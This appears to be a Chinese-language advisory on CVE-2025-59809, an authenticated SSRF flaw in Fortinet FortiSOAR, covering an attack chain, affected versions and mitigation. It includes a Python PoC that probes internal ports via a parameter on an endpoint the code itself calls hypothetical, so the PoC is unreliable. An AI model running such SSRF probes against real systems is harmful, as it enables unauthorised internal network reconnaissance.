CVE-2025-59809 Fortinet FortiSOAR 服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-59809

漏洞类型

SSRF (服务器端请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiSOAR

漏洞概述

Fortinet FortiSOAR 的多个版本（包括 PaaS 和本地部署）存在服务器端请求伪造 (SSRF) 漏洞。该漏洞源于 CWE-918，允许经过身份验证的低权限攻击者通过发送精心构造的恶意请求，诱导服务器向内网发起连接。攻击者可借此探测内网服务及本地端口运行情况，导致敏感信息泄露，对系统机密性构成威胁。

技术细节

该漏洞属于典型的服务器端请求伪造 (SSRF)，根因在于 FortiSOAR 在处理特定业务逻辑时，未对用户输入的 URL 或资源标识符进行严格的校验和过滤。攻击者需要具备低权限账户 (PR:L) 访问权限。利用过程中，攻击者通过发送特制的 HTTP 请求，将原本指向外部合法资源的请求重定向至内部网络地址（如 127.0.0.1, 192.168.x.x 等）或本地特定端口。由于请求是由服务器端发起的，它能绕过防火墙对内网的直接访问限制。通过分析服务器返回的响应内容、响应时间或 HTTP 状态码，攻击者可以探测内网服务开放情况，识别敏感资产，进而为后续的内网横向移动奠定基础。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网络中的 Fortinet FortiSOAR 实例。

STEP 2

2. 获取凭证

攻击者通过钓鱼或其他方式获取一个低权限的合法账户凭证 (PR:L)。

STEP 3

3. 发起攻击

攻击者登录系统，并向存在漏洞的接口发送包含内网地址（如 127.0.0.1）的精心构造的 HTTP 请求。

STEP 4

4. 服务探测

服务器端解析请求并向内网地址发起连接，攻击者根据响应差异判断本地端口是否开放。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "https://<fortisoar-ip>"
vulnerable_endpoint = "/api/rest/endpoint" # Hypothetical endpoint based on SSRF nature

# Attacker credentials (Low privilege required)
username = "low_priv_user"
password = "password"

# Internal target to scan (e.g., localhost port 8080)
internal_target = "http://127.0.0.1:8080"

def exploit_ssrf():
    session = requests.Session()
    
    # 1. Authenticate
    login_url = f"{target_host}/login"
    login_data = {"username": username, "password": password}
    session.post(login_url, data=login_data)
    
    # 2. Send malicious payload
    # The payload injects the internal URL into a parameter vulnerable to SSRF
    exploit_url = f"{target_host}{vulnerable_endpoint}"
    payload = {
        "config_url": internal_target, # Parameter controlled by attacker
        "action": "test"
    }
    
    try:
        response = session.post(exploit_url, json=payload, verify=False)
        print(f"Status Code: {response.status_code}")
        print(f"Response Body: {response.text}")
        
        if "Connection refused" not in response.text and response.status_code != 404:
            print("[+] Internal service detected or SSRF successful")
        else:
            print("[-] Service might be down or filtered")
            
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    exploit_ssrf()

影响范围

FortiSOAR PaaS 7.3.0 - 7.3.x

FortiSOAR PaaS 7.4.0 - 7.4.x

FortiSOAR PaaS 7.5.0 - 7.5.2

FortiSOAR PaaS 7.6.0 - 7.6.4

FortiSOAR 本地部署 7.3.0 - 7.3.x

FortiSOAR 本地部署 7.4.0 - 7.4.x

FortiSOAR 本地部署 7.5.0 - 7.5.2

FortiSOAR 本地部署 7.6.0 - 7.6.4

防御指南

临时缓解措施

建议立即应用 Fortinet 官方提供的修复补丁。在无法立即升级的情况下，应通过网络访问控制列表 (ACL) 严格限制 FortiSOAR 服务器仅能访问受信任的外部 IP，阻断其向内网敏感网段（如 127.0.0.1, 10.0.0.0/8 等）发起连接的能力。同时，加强对认证日志的审计，及时发现并阻断异常的探测行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59809
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59809
3 Details https://www.cvedetails.com/cve/CVE-2025-59809/
4 VulDB https://vuldb.com/cve/CVE-2025-59809
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-26-103